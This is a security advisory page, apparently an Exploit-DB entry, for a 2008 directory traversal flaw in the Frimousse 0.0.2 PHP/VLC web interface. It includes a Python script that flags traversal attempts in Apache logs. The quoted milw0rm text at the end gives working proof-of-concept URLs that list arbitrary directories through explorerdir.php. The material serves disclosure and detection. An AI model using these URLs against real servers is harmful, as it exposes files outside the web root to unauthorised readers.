Vendor: Frimousse
By: Houssamix
CVSS: 7.5 (HIGH)
Directory Traversal (CWE-22)
Product Name: Frimousse
Affected Version From: 0.0.2
Affected Version To: 0.0.2
Patch Exists: Yes
Related CWE: N/A
CPE: a:frimousseweb:frimousse
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Microsoft Windows
2008

Frimousse v.0.0.2 Directory Traversal Vulnerability

Frimousse is a freeplayer web interface written in PHP that works with Apache, PHP and VLC (media player). It is used for managing the playlist and viewing it in a web interface with VLC media player. Frimousse runs on Linux and Microsoft Windows. A directory traversal vulnerability was discovered in Frimousse v.0.0.2, which allows an attacker to access arbitrary files and directories outside of the web root directory.

Mitigation:

Upgrade to the latest version of Frimousse.
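
To check whether an exposed 0.0.2 instance has been probed, the web server access log can be searched for explorerdir.php requests whose name parameter points outside a relative folder. The script below is an added example, not code from Frimousse or from the original advisory; the Apache common/combined log format, the rule that legitimate name values are relative folder names, and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Request part of an Apache common/combined log entry (assumed log format).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
DRIVE_RE = re.compile(r"^[A-Za-z]:")               # C: or C:\Program Files
DOTDOT_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")  # a ".." path segment

# Constructed sample log lines; the client addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Jan/2008:10:00:01 +0000] "GET /explorerdir.php?name=music HTTP/1.1" 200 512',
    '192.0.2.44 - - [20/Jan/2008:10:00:07 +0000] "GET /explorerdir.php?name=C: HTTP/1.1" 200 2048',
    '192.0.2.44 - - [20/Jan/2008:10:00:09 +0000] "GET /explorerdir.php?name=C:%5CProgram%20Files HTTP/1.1" 200 4096',
    '192.0.2.51 - - [20/Jan/2008:10:01:15 +0000] "GET /explorerdir.php?name=/etc HTTP/1.1" 200 900',
    '192.0.2.51 - - [20/Jan/2008:10:01:20 +0000] "GET /explorerdir.php?name=..%2F.. HTTP/1.1" 200 700',
    '192.0.2.10 - - [20/Jan/2008:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 300',
]


def classify_name(value):
    """Return why `value` leaves a relative folder, or None if it does not.

    Assumption: legitimate `name` values are relative folder names.
    """
    if DRIVE_RE.match(value):
        return "drive-letter path"
    if value.startswith(("/", "\\")):
        return "absolute or UNC path"
    if DOTDOT_RE.search(value):
        return "parent-directory segment"
    return None


def suspicious_requests(log_lines):
    """Return (client_ip, decoded_name, reason) for flagged explorerdir.php requests."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith("/explorerdir.php"):
            continue
        # parse_qs percent-decodes the value, so %5C and %2F are seen as \ and /.
        for value in parse_qs(url.query, keep_blank_values=True).get("name", []):
            reason = classify_name(value)
            if reason:
                hits.append((m.group("ip"), value, reason))
    return hits
```

Calling suspicious_requests() on the lines of a real access log returns one tuple per flagged request; hits only show that the parameter was used this way, so the response status and size in the same log line are the next thing to review.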

Exploit-DB raw data:

software : Frimousse v.0.0.2
vendor : http://frimousseweb.free.fr/

[+] Introduction
Frimousse is a freeplayer web interface written in PHP; it works with Apache, PHP and VLC (media player).
It is used to manage the playlist and view it in a web interface with VLC media player.
Frimousse runs on Linux and Microsoft Windows.

Apache, PHP and VLC are integrated in the setup of the version for Windows and attached with the PHP archive for Linux:

Frimousse 0.0.2 setup.exe   > http://frimousseweb.free.fr/files/Frimousse_0.0.2_setup.exe
Frimousse 0.0.2 minimal.rar  > http://frimousseweb.free.fr/files/Frimousse_0.0.2_minimal_install.rar

[+] vulnerability discovered by : Houssamix  from H-T Team 
H-T Team = HouSSaMix + ToXiC350 + RxH

[+] vulnerable version : Frimousse v.0.0.2 

{ BUG } : directory traversals  :

   => xpl > http://127.0.0.1:8080/explorerdir.php?name=[directory]
   => ex > http://127.0.0.1:8080/explorerdir.php?name=C:
             http://127.0.0.1:8080/explorerdir.php?name=C:\Program Files

------------------------------------------------------------------------------------------
-  H-T Team  -- greetz : Cold-zero (hackteach.org) -Mahmood_ali (tryag.cc) - DDos & all hackers muslims   --
------------------------------------------------------------------------------------------

# milw0rm.com [2008-01-20]